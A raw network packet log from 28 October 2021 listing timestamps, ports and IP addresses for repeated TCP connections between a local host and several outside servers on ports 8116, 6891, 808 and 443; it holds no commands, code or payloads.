Oct 28, 2021 05:26:58.268008947 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.268048048 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.268134117 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.274941921 CEST	49836	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.328943968 CEST	8116	49836	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.339591026 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.339958906 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.387994051 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.388032913 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:58.388151884 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.388614893 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.388629913 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:58.720942020 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.720977068 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.721087933 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.726208925 CEST	49835	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:58.852108002 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.892174006 CEST	6891	49835	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:58.904953957 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.907490015 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:58.907685041 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.908665895 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.909040928 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.909825087 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.909832954 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:58.914433956 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.914447069 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:58.914593935 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:58.914606094 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:58.961714983 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.961915970 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:58.962136030 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.963191032 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.966800928 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:58.966886997 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:59.019721985 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:59.020073891 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:59.020423889 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:59.211518049 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:59.211548090 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:59.211642027 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:59.213998079 CEST	49838	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:59.266674995 CEST	8116	49838	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:59.341197968 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.341249943 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.341371059 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.341972113 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.341985941 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.623686075 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.623759985 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.623862028 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.629595995 CEST	49837	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.629623890 CEST	443	49837	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.747380018 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:59.866121054 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.866241932 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.866851091 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.866867065 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.871635914 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.871654034 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.871706009 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:59.871714115 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:59.911216021 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:59.911931992 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:59.914020061 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.077653885 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.077733994 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.077792883 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.078705072 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.083281994 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.083404064 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.242609978 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.247040033 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.247065067 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.247143030 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.247155905 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.580920935 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:00.580991983 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:00.581088066 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:00.583281994 CEST	49839	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:00.583306074 CEST	443	49839	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:00.630276918 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.630300999 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.630398035 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.630433083 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.636589050 CEST	49840	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.714777946 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.748899937 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:00.802258015 CEST	808	49840	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.875324965 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:00.877541065 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.878079891 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:00.914956093 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:00.915198088 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:00.916315079 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.038466930 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.038620949 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.038718939 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:01.041198969 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:01.045170069 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:01.045275927 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:01.082967997 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.082999945 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.084352970 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.129647017 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.133147001 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.133178949 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.202611923 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.207405090 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.207418919 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.299176931 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.299201965 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.299213886 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.591638088 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.591661930 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.591741085 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:01.594067097 CEST	49841	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:01.683959961 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.683984995 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.685986042 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.691548109 CEST	49842	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.723763943 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.754558086 CEST	808	49841	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:01.812108994 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:01.857759953 CEST	6891	49842	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.872983932 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:01.873078108 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:01.880351067 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:01.889909983 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:01.890002966 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.890713930 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:01.941088915 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:01.941315889 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:01.942756891 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:01.944730997 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:01.952652931 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:01.952908993 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:02.013643980 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.014035940 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.014482021 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.056703091 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.056741953 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.062714100 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.063761950 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.068927050 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.069029093 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.183944941 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.183969021 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.184108973 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:02.235671043 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.235692024 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.630291939 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.630312920 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.630423069 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.630458117 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.717422009 CEST	49844	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:02.718933105 CEST	49843	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:02.778244972 CEST	8116	49844	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.884907007 CEST	6891	49843	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:02.931720018 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:02.931766987 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:02.931839943 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:02.933507919 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:02.934104919 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:02.934124947 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:02.981796980 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:02.981909990 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:02.982530117 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.030531883 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:03.030658007 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:03.030720949 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.031227112 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.036211014 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.036328077 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.085141897 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:03.256934881 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:03.256963015 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:03.257081032 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.260710955 CEST	49846	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:03.308890104 CEST	8116	49846	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:03.377819061 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:03.377863884 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:03.377933025 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:03.378658056 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:03.378670931 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:03.461652994 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:03.461827993 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:03.867940903 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:03.868139982 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.391757965 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.391789913 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:04.396321058 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.396342993 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:04.396409988 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.396420956 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:04.407989979 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.408014059 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:04.412327051 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.412343025 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:04.412514925 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:04.412529945 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.099227905 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.099333048 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.099354982 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:05.099406958 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:05.102463961 CEST	49847	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:05.102493048 CEST	443	49847	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.220041037 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.389225006 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.389830112 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.390793085 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.394500971 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.394572020 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:05.394582033 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.394705057 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:05.403311968 CEST	49845	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:05.403346062 CEST	443	49845	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:05.515768051 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.559752941 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.559797049 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.561113119 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.562932014 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.569828987 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.569931984 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.676065922 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.676266909 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.677078009 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.731905937 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.738828897 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.738852024 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.738858938 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.837073088 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.837311983 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:05.839102030 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.839637041 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.845010996 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.845125914 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:05.999402046 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.005012989 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.005032063 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.005043983 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.133222103 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.133244991 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.133322001 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:06.135895014 CEST	49848	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:06.262676001 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.304776907 CEST	808	49848	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.386497021 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.386518002 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.386558056 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:06.386589050 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:06.393845081 CEST	49849	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:06.428644896 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.428775072 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.429682970 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.521234989 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.553786993 CEST	808	49849	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:06.595503092 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.595617056 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.595690012 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.596092939 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.599555016 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.599658012 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.694843054 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.695014954 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.695966005 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.765450954 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.765465975 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.803075075 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.861870050 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.862052917 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:06.862128019 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.862620115 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.866560936 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:06.866693020 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.032579899 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.032635927 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.032665968 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.144540071 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.144556999 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.144642115 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.144695997 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.147353888 CEST	49850	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.270745993 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.313493013 CEST	6891	49850	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.318624020 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.318708897 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.319376945 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.376991034 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.377156019 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.377228975 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.377711058 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.382410049 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.382524014 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.418000937 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.418020010 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.418083906 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.418119907 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.424338102 CEST	49851	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:07.430124044 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.430454016 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.430871010 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.546690941 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.594664097 CEST	6891	49851	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:07.599174976 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.599299908 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.599746943 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.599759102 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.599819899 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.599860907 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.600102901 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.602874041 CEST	49857	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.651241064 CEST	8116	49857	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.651257992 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.655158997 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.655221939 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.655774117 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.660351038 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.660480022 CEST	49858	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:07.711832047 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.712049961 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.725574970 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:07.725641966 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:07.725792885 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:07.726452112 CEST	49859	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:07.726486921 CEST	443	49859	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:07.881232023 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.881258011 CEST	8116	49858	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:07.881321907 CEST	49858	8116	192.168.2.3	185.56.219.47
